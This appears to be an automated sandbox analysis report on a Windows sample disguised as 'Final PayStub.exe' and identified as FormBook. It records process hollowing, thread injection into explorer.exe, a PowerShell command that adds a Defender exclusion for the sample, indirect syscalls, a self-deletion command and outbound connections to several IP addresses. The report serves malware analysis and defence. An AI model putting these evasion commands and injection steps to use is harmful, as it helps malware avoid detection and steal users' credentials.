Source: C:\Users\user\Desktop\Final PayStub.exe	Code function: 6_2_01386A50 mov eax, dword ptr fs:[00000030h]	6_2_01386A50
Source: C:\Users\user\Desktop\Final PayStub.exe	Code function: 6_2_01388AA0 mov eax, dword ptr fs:[00000030h]	6_2_01388AA0
Source: C:\Users\user\Desktop\Final PayStub.exe	Code function: 6_2_01388AA0 mov eax, dword ptr fs:[00000030h]	6_2_01388AA0
Source: C:\Users\user\Desktop\Final PayStub.exe	Code function: 6_2_013D6AA4 mov eax, dword ptr fs:[00000030h]	6_2_013D6AA4
Source: C:\Users\user\Desktop\Final PayStub.exe	Code function: 6_2_013B8A90 mov edx, dword ptr fs:[00000030h]	6_2_013B8A90
Source: C:\Users\user\Desktop\Final PayStub.exe	Code function: 6_2_0138EA80 mov eax, dword ptr fs:[00000030h]	6_2_0138EA80
Source: C:\Users\user\Desktop\Final PayStub.exe	Code function: 6_2_0138EA80 mov eax, dword ptr fs:[00000030h]	6_2_0138EA80
Source: C:\Users\user\Desktop\Final PayStub.exe	Code function: 6_2_0138EA80 mov eax, dword ptr fs:[00000030h]	6_2_0138EA80
Source: C:\Users\user\Desktop\Final PayStub.exe	Code function: 6_2_0138EA80 mov eax, dword ptr fs:[00000030h]	6_2_0138EA80
Source: C:\Users\user\Desktop\Final PayStub.exe	Code function: 6_2_0138EA80 mov eax, dword ptr fs:[00000030h]	6_2_0138EA80
Source: C:\Users\user\Desktop\Final PayStub.exe	Code function: 6_2_0138EA80 mov eax, dword ptr fs:[00000030h]	6_2_0138EA80
Source: C:\Users\user\Desktop\Final PayStub.exe	Code function: 6_2_0138EA80 mov eax, dword ptr fs:[00000030h]	6_2_0138EA80
Source: C:\Users\user\Desktop\Final PayStub.exe	Code function: 6_2_0138EA80 mov eax, dword ptr fs:[00000030h]	6_2_0138EA80
Source: C:\Users\user\Desktop\Final PayStub.exe	Code function: 6_2_0138EA80 mov eax, dword ptr fs:[00000030h]	6_2_0138EA80
Source: C:\Users\user\Desktop\Final PayStub.exe	Code function: 6_2_01454A80 mov eax, dword ptr fs:[00000030h]	6_2_01454A80
Source: C:\Users\user\Desktop\Final PayStub.exe	Code function: 6_2_013BAAEE mov eax, dword ptr fs:[00000030h]	6_2_013BAAEE
Source: C:\Users\user\Desktop\Final PayStub.exe	Code function: 6_2_013BAAEE mov eax, dword ptr fs:[00000030h]	6_2_013BAAEE
Source: C:\Users\user\Desktop\Final PayStub.exe	Code function: 6_2_01380AD0 mov eax, dword ptr fs:[00000030h]	6_2_01380AD0
Source: C:\Users\user\Desktop\Final PayStub.exe	Code function: 6_2_013B4AD0 mov eax, dword ptr fs:[00000030h]	6_2_013B4AD0
Source: C:\Users\user\Desktop\Final PayStub.exe	Code function: 6_2_013B4AD0 mov eax, dword ptr fs:[00000030h]	6_2_013B4AD0
Source: C:\Users\user\Desktop\Final PayStub.exe	Code function: 6_2_013D6ACC mov eax, dword ptr fs:[00000030h]	6_2_013D6ACC
Source: C:\Users\user\Desktop\Final PayStub.exe	Code function: 6_2_013D6ACC mov eax, dword ptr fs:[00000030h]	6_2_013D6ACC
Source: C:\Users\user\Desktop\Final PayStub.exe	Code function: 6_2_013D6ACC mov eax, dword ptr fs:[00000030h]	6_2_013D6ACC
Source: C:\Users\user\Desktop\Final PayStub.exe	Code function: 6_2_013B4D1D mov eax, dword ptr fs:[00000030h]	6_2_013B4D1D
Source: C:\Users\user\Desktop\Final PayStub.exe	Code function: 6_2_01376D10 mov eax, dword ptr fs:[00000030h]	6_2_01376D10
Source: C:\Users\user\Desktop\Final PayStub.exe	Code function: 6_2_01376D10 mov eax, dword ptr fs:[00000030h]	6_2_01376D10
Source: C:\Users\user\Desktop\Final PayStub.exe	Code function: 6_2_01376D10 mov eax, dword ptr fs:[00000030h]	6_2_01376D10
Source: C:\Users\user\Desktop\Final PayStub.exe	Code function: 6_2_01418D6B mov eax, dword ptr fs:[00000030h]	6_2_01418D6B
Source: C:\Users\user\Desktop\Final PayStub.exe	Code function: 6_2_0139AD00 mov eax, dword ptr fs:[00000030h]	6_2_0139AD00
Source: C:\Users\user\Desktop\Final PayStub.exe	Code function: 6_2_0139AD00 mov eax, dword ptr fs:[00000030h]	6_2_0139AD00
Source: C:\Users\user\Desktop\Final PayStub.exe	Code function: 6_2_0139AD00 mov eax, dword ptr fs:[00000030h]	6_2_0139AD00
Source: C:\Users\user\Desktop\Final PayStub.exe	Code function: 6_2_01438D10 mov eax, dword ptr fs:[00000030h]	6_2_01438D10
Source: C:\Users\user\Desktop\Final PayStub.exe	Code function: 6_2_01438D10 mov eax, dword ptr fs:[00000030h]	6_2_01438D10
Source: C:\Users\user\Desktop\Final PayStub.exe	Code function: 6_2_01408D20 mov eax, dword ptr fs:[00000030h]	6_2_01408D20
Source: C:\Users\user\Desktop\Final PayStub.exe	Code function: 6_2_01380D59 mov eax, dword ptr fs:[00000030h]	6_2_01380D59
Source: C:\Users\user\Desktop\Final PayStub.exe	Code function: 6_2_01380D59 mov eax, dword ptr fs:[00000030h]	6_2_01380D59
Source: C:\Users\user\Desktop\Final PayStub.exe	Code function: 6_2_01380D59 mov eax, dword ptr fs:[00000030h]	6_2_01380D59
Source: C:\Users\user\Desktop\Final PayStub.exe	Code function: 6_2_01388D59 mov eax, dword ptr fs:[00000030h]	6_2_01388D59
Source: C:\Users\user\Desktop\Final PayStub.exe	Code function: 6_2_01388D59 mov eax, dword ptr fs:[00000030h]	6_2_01388D59
Source: C:\Users\user\Desktop\Final PayStub.exe	Code function: 6_2_01388D59 mov eax, dword ptr fs:[00000030h]	6_2_01388D59
Source: C:\Users\user\Desktop\Final PayStub.exe	Code function: 6_2_01388D59 mov eax, dword ptr fs:[00000030h]	6_2_01388D59
Source: C:\Users\user\Desktop\Final PayStub.exe	Code function: 6_2_01388D59 mov eax, dword ptr fs:[00000030h]	6_2_01388D59
Source: C:\Users\user\Desktop\Final PayStub.exe	Code function: 6_2_013A8DBF mov eax, dword ptr fs:[00000030h]	6_2_013A8DBF
Source: C:\Users\user\Desktop\Final PayStub.exe	Code function: 6_2_013A8DBF mov eax, dword ptr fs:[00000030h]	6_2_013A8DBF

Source: C:\Users\user\Desktop\Final PayStub.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Users\user\Desktop\Final PayStub.exe	Process token adjusted: Debug	Jump to behavior

Source: C:\Windows\SysWOW64\systray.exe

Code function: 13_2_00491B93 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,

13_2_00491B93

Source: C:\Users\user\Desktop\Final PayStub.exe

Memory allocated: page read and write | page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion

System process connects to network (likely due to code injection or exploit)

Source: C:\Windows\explorer.exe	Network Connect: 104.21.32.1 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 150.95.255.38 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 18.130.191.149 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 67.211.70.30 80	Jump to behavior

Adds a directory exclusion to Windows Defender

Source: C:\Users\user\Desktop\Final PayStub.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Final PayStub.exe"
Source: C:\Users\user\Desktop\Final PayStub.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Final PayStub.exe"			Jump to behavior

Found direct / indirect Syscall (likely to bypass EDR)

Source: C:\Users\user\Desktop\Final PayStub.exe	NtClose: Indirect: 0x17AA56C
Source: C:\Users\user\Desktop\Final PayStub.exe	NtQueueApcThread: Indirect: 0x17AA4F2			Jump to behavior

Injects a PE file into a foreign processes

Source: C:\Users\user\Desktop\Final PayStub.exe

Memory written: C:\Users\user\Desktop\Final PayStub.exe base: 400000 value starts with: 4D5A

Jump to behavior

Maps a DLL or memory area into another process

Source: C:\Users\user\Desktop\Final PayStub.exe	Section loaded: NULL target: C:\Windows\explorer.exe protection: execute and read and write	Jump to behavior
Source: C:\Users\user\Desktop\Final PayStub.exe	Section loaded: NULL target: C:\Windows\SysWOW64\systray.exe protection: execute and read and write	Jump to behavior
Source: C:\Users\user\Desktop\Final PayStub.exe	Section loaded: NULL target: C:\Windows\SysWOW64\systray.exe protection: execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\systray.exe	Section loaded: NULL target: C:\Windows\explorer.exe protection: read write	Jump to behavior
Source: C:\Windows\SysWOW64\systray.exe	Section loaded: NULL target: C:\Windows\explorer.exe protection: execute and read and write	Jump to behavior

Modifies the context of a thread in another process (thread injection)

Source: C:\Users\user\Desktop\Final PayStub.exe	Thread register set: target process: 496			Jump to behavior
Source: C:\Windows\SysWOW64\systray.exe	Thread register set: target process: 496			Jump to behavior

Queues an APC in another process (thread injection)

Source: C:\Users\user\Desktop\Final PayStub.exe

Thread APC queued: target process: C:\Windows\explorer.exe

Jump to behavior

Sample uses process hollowing technique

Source: C:\Users\user\Desktop\Final PayStub.exe

Section unmapped: C:\Windows\SysWOW64\systray.exe base address: 490000

Jump to behavior

Source: C:\Users\user\Desktop\Final PayStub.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Final PayStub.exe"	Jump to behavior
Source: C:\Users\user\Desktop\Final PayStub.exe	Process created: C:\Users\user\Desktop\Final PayStub.exe "C:\Users\user\Desktop\Final PayStub.exe"	Jump to behavior
Source: C:\Users\user\Desktop\Final PayStub.exe	Process created: C:\Users\user\Desktop\Final PayStub.exe "C:\Users\user\Desktop\Final PayStub.exe"	Jump to behavior
Source: C:\Users\user\Desktop\Final PayStub.exe	Process created: C:\Users\user\Desktop\Final PayStub.exe "C:\Users\user\Desktop\Final PayStub.exe"	Jump to behavior
Source: C:\Windows\SysWOW64\systray.exe	Process created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Users\user\Desktop\Final PayStub.exe"	Jump to behavior

Source: explorer.exe, 00000007.00000002.2468232607.0000000000949000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.1245900996.0000000000949000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Progmanh
Source: explorer.exe, 00000007.00000002.2470223359.00000000010F1000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000007.00000002.2476642656.00000000094C7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.1256622166.00000000094C7000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: Shell_TrayWnd
Source: explorer.exe, 00000007.00000002.2470223359.00000000010F1000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000007.00000000.1246411467.00000000010F1000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Progman
Source: explorer.exe, 00000007.00000002.2470223359.00000000010F1000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000007.00000000.1246411467.00000000010F1000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Program ManagerW
Source: explorer.exe, 00000007.00000002.2470223359.00000000010F1000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000007.00000000.1246411467.00000000010F1000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Progmanlock

Source: C:\Users\user\Desktop\Final PayStub.exe	Queries volume information: C:\Users\user\Desktop\Final PayStub.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Final PayStub.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Final PayStub.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Final PayStub.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Final PayStub.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Final PayStub.exe	Queries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C: VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C: VolumeInformation	Jump to behavior

Source: C:\Windows\SysWOW64\systray.exe

Code function: 13_2_00491A45 GetSystemTimeAsFileTime,GetCurrentProcessId,GetCurrentThreadId,GetTickCount,QueryPerformanceCounter,

13_2_00491A45

Source: C:\Users\user\Desktop\Final PayStub.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Stealing of Sensitive Information

Yara detected FormBook

Source: Yara match	File source: 6.2.Final PayStub.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.Final PayStub.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000000D.00000002.2468663699.0000000003150000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000002.2467525905.0000000002BA0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.1304138024.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000002.2468573354.0000000003120000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1246427510.00000000037A9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

Remote Access Functionality

Yara detected FormBook

Source: Yara match	File source: 6.2.Final PayStub.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.Final PayStub.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000000D.00000002.2468663699.0000000003150000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000002.2467525905.0000000002BA0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.1304138024.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000002.2468573354.0000000003120000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1246427510.00000000037A9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	1 Shared Modules	1 DLL Side-Loading	1 Abuse Elevation Control Mechanism	11 Disable or Modify Tools	1 Credential API Hooking	1 System Time Discovery	Remote Services	1 Archive Collected Data	2 Ingress Tool Transfer	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	2 Command and Scripting Interpreter	Boot or Logon Initialization Scripts	1 DLL Side-Loading	1 Deobfuscate/Decode Files or Information	LSASS Memory	1 File and Directory Discovery	Remote Desktop Protocol	1 Credential API Hooking	1 Encrypted Channel	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	612 Process Injection	1 Abuse Elevation Control Mechanism	Security Account Manager	224 System Information Discovery	SMB/Windows Admin Shares	Data from Network Shared Drive	2 Non-Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	4 Obfuscated Files or Information	NTDS	241 Security Software Discovery	Distributed Component Object Model	Input Capture	12 Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	12 Software Packing	LSA Secrets	2 Process Discovery	SSH	Keylogging	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	1 Timestomp	Cached Domain Credentials	61 Virtualization/Sandbox Evasion	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	1 DLL Side-Loading	DCSync	1 Application Window Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	1 Rootkit	Proc Filesystem	System Owner/User Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement
Network Topology	Malvertising	Exploit Public-Facing Application	Command and Scripting Interpreter	At	At	1 Masquerading	/etc/passwd and /etc/shadow	Network Sniffing	Direct Cloud VM Connections	Data Staged	Web Protocols	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Internal Defacement
IP Addresses	Compromise Infrastructure	Supply Chain Compromise	PowerShell	Cron	Cron	61 Virtualization/Sandbox Evasion	Network Sniffing	Network Service Discovery	Shared Webroot	Local Data Staging	File Transfer Protocols	Exfiltration Over Asymmetric Encrypted Non-C2 Protocol	External Defacement
Network Security Appliances	Domains	Compromise Software Dependencies and Development Tools	AppleScript	Launchd	Launchd	612 Process Injection	Input Capture	System Network Connections Discovery	Software Deployment Tools	Remote Data Staging	Mail Protocols	Exfiltration Over Unencrypted Non-C2 Protocol	Firmware Corruption

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report Final PayStub.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: FormBook

Yara Signatures

Memory Dumps

Unpacked PEs

Sigma Signatures

System Summary

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Software Vulnerabilities

Networking

E-Banking Fraud

System Summary

Data Obfuscation

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Windows Analysis Report
Final PayStub.exe